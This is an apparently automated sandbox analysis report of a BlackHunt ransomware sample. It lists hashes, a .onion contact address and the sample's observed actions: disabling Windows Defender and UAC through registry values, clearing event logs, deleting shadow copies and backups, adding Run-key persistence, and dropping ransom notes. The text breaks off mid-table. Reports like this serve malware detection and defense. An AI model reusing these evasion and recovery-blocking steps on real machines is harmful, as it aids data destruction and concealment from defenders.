Analysis
-
max time kernel
117s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
18-01-2024 22:30
Static task
static1
Behavioral task
behavioral1
Sample
0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe
Resource
win10v2004-20231215-en
General
-
Target
0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe
-
Size
707KB
-
MD5
bc72f03f74fbdab0d0e593d85778cd12
-
SHA1
0abdb290f79806ee678b917ce9498d44a58b6def
-
SHA256
0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a
-
SHA512
51042979f2fc7444ff4ea351f5af77d8d68b647f39ec81ece3d8a67ff16ea025a4454f479288b6161069d15dfecb2afd0309d944eb255f7408070189e4a17b3e
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1U8uvnh:6uaTmkZJ+naie5OTamgEoKxLW/wh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2388 fsutil.exe 2204 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 3552 wevtutil.exe 3908 wevtutil.exe 3780 wevtutil.exe 3524 wevtutil.exe 3028 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 2884 bcdedit.exe 2124 bcdedit.exe 3000 bcdedit.exe 2824 bcdedit.exe -
Renames multiple (2866) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 1028 wbadmin.exe 1216 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 3108 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\T: 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened (read-only) \??\Y: 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\N: 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened (read-only) \??\B: 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened (read-only) \??\W: 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened (read-only) \??\E: 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened (read-only) \??\I: 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\H: 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened (read-only) \??\J: 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened (read-only) \??\Z: 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened (read-only) \??\M: 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened (read-only) \??\Q: 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened (read-only) \??\O: 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened (read-only) \??\G: 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened (read-only) \??\R: 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened (read-only) \??\S: 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened (read-only) \??\X: 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\K: 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened (read-only) \??\L: 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened (read-only) \??\V: 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\U: 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened (read-only) \??\P: 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened (read-only) \??\A: 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\#BlackHunt_Private.key 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Puerto_Rico 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\license.html 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\#BlackHunt_ReadMe.hta 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\vlc.mo 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\cli.luac 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File created C:\Program Files (x86)\Google\Update\1.3.36.151\#BlackHunt_ReadMe.txt 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\artifacts.xml 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-tools_zh_CN.jar 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\#BlackHunt_ReadMe.hta 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File created C:\Program Files\VideoLAN\VLC\plugins\packetizer\#BlackHunt_ReadMe.hta 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\#BlackHunt_ReadMe.hta 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\console_view.png 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jvmstat.jar 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\Java\jre7\lib\jce.jar 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-tabcontrol.xml 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\VERSION.txt 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File created C:\Program Files\VideoLAN\VLC\locale\co\#BlackHunt_ReadMe.hta 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Canary 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\#BlackHunt_Private.key 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\#BlackHunt_Private.key 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\#BlackHunt_ReadMe.txt 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\7-Zip\7-zip.chm 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\7-Zip\Lang\sr-spl.txt 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-execution.jar 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-search.xml 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\#BlackHunt_ReadMe.txt 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Rothera 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Aqtau 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\MST7MDT 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\#BlackHunt_Private.key 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Apia 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile.html 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\feature.xml 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\#BlackHunt_ReadMe.txt 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File created C:\Program Files\VideoLAN\VLC\skins\fonts\#BlackHunt_Private.key 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\#BlackHunt_ReadMe.hta 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\ij 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File created C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\#BlackHunt_ReadMe.txt 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationRight_SelectionSubpicture.png 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\#BlackHunt_ReadMe.hta 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Kosrae 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\feature.properties 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\epl-v10.html 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-impl.xml 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Full\#BlackHunt_ReadMe.txt 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationLeft_SelectionSubpicture.png 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File created C:\Program Files\VideoLAN\VLC\lua\sd\#BlackHunt_ReadMe.hta 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\03_lastfm.luac 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-common.xml 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\#BlackHunt_Private.key 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-core.xml 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File created C:\Program Files\VideoLAN\VLC\locale\mn\#BlackHunt_Private.key 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\#BlackHunt_ReadMe.txt 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\dblook 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.configuration_5.5.0.165303.jar 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\day-of-week-16.png 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-options-api.xml 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File created C:\Program Files\DVD Maker\Shared\#BlackHunt_ReadMe.txt 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Novokuznetsk 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File created C:\Program Files\Java\jre7\lib\zi\Antarctica\#BlackHunt_Private.key 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler.jar 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\LINEAR_RGB.pf 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\CET 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2820 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1756 vssadmin.exe 1248 vssadmin.exe 2700 vssadmin.exe 2880 vssadmin.exe 2676 vssadmin.exe 2884 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 1528 taskkill.exe -
Modifies registry class 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 636 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1124 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe Token: SeRestorePrivilege 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe Token: SeBackupPrivilege 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe Token: SeTakeOwnershipPrivilege 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe Token: SeAuditPrivilege 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe Token: SeSecurityPrivilege 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe Token: SeIncBasePriorityPrivilege 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe Token: SeBackupPrivilege 296 vssvc.exe Token: SeRestorePrivilege 296 vssvc.exe Token: SeAuditPrivilege 296 vssvc.exe Token: SeBackupPrivilege 2756 wbengine.exe Token: SeRestorePrivilege 2756 wbengine.exe Token: SeSecurityPrivilege 2756 wbengine.exe Token: SeSecurityPrivilege 3552 wevtutil.exe Token: SeBackupPrivilege 3552 wevtutil.exe Token: SeSecurityPrivilege 3908 wevtutil.exe Token: SeSecurityPrivilege 3780 wevtutil.exe Token: SeSecurityPrivilege 3524 wevtutil.exe Token: SeSecurityPrivilege 3028 wevtutil.exe Token: SeBackupPrivilege 3908 wevtutil.exe Token: SeBackupPrivilege 3028 wevtutil.exe Token: SeBackupPrivilege 3780 wevtutil.exe Token: SeBackupPrivilege 3524 wevtutil.exe Token: SeDebugPrivilege 1528 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2224 wrote to memory of 1324 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 32 PID 2224 wrote to memory of 1324 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 32 PID 2224 wrote to memory of 1324 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 32 PID 2224 wrote to memory of 1324 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 32 PID 2224 wrote to memory of 2012 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 30 PID 2224 wrote to memory of 2012 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 30 PID 2224 wrote to memory of 2012 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 30 PID 2224 wrote to memory of 2012 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 30 PID 1324 wrote to memory of 2496 1324 cmd.exe 33 PID 1324 wrote to memory of 2496 1324 cmd.exe 33 PID 1324 wrote to memory of 2496 1324 cmd.exe 33 PID 2224 wrote to memory of 2140 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 34 PID 2224 wrote to memory of 2140 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 34 PID 2224 wrote to memory of 2140 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 34 PID 2224 wrote to memory of 2140 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 34 PID 2224 wrote to memory of 2724 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 36 PID 2224 wrote to memory of 2724 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 36 PID 2224 wrote to memory of 2724 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 36 PID 2224 wrote to memory of 2724 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 36 PID 2012 wrote to memory of 2808 2012 cmd.exe 38 PID 2012 wrote to memory of 2808 2012 cmd.exe 38 PID 2012 wrote to memory of 2808 2012 cmd.exe 38 PID 2224 wrote to memory of 2824 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 39 PID 2224 wrote to memory of 2824 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 39 PID 2224 wrote to memory of 2824 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 39 PID 2224 wrote to memory of 2824 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 39 PID 2140 wrote to memory of 2848 2140 cmd.exe 40 PID 2140 wrote to memory of 2848 2140 cmd.exe 40 PID 2140 wrote to memory of 2848 2140 cmd.exe 40 PID 2224 wrote to memory of 2864 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 41 PID 2224 wrote to memory of 2864 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 41 PID 2224 wrote to memory of 2864 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 41 PID 2224 wrote to memory of 2864 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 41 PID 2224 wrote to memory of 2772 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 43 PID 2224 wrote to memory of 2772 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 43 PID 2224 wrote to memory of 2772 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 43 PID 2224 wrote to memory of 2772 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 43 PID 2724 wrote to memory of 2852 2724 vds.exe 146 PID 2724 wrote to memory of 2852 2724 vds.exe 146 PID 2724 wrote to memory of 2852 2724 vds.exe 146 PID 2224 wrote to memory of 2804 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 44 PID 2224 wrote to memory of 2804 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 44 PID 2224 wrote to memory of 2804 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 44 PID 2224 wrote to memory of 2804 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 44 PID 2224 wrote to memory of 2740 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 153 PID 2224 wrote to memory of 2740 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 153 PID 2224 wrote to memory of 2740 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 153 PID 2224 wrote to memory of 2740 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 153 PID 2224 wrote to memory of 2776 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 50 PID 2224 wrote to memory of 2776 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 50 PID 2224 wrote to memory of 2776 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 50 PID 2224 wrote to memory of 2776 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 50 PID 2224 wrote to memory of 2948 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 52 PID 2224 wrote to memory of 2948 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 52 PID 2224 wrote to memory of 2948 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 52 PID 2224 wrote to memory of 2948 2224 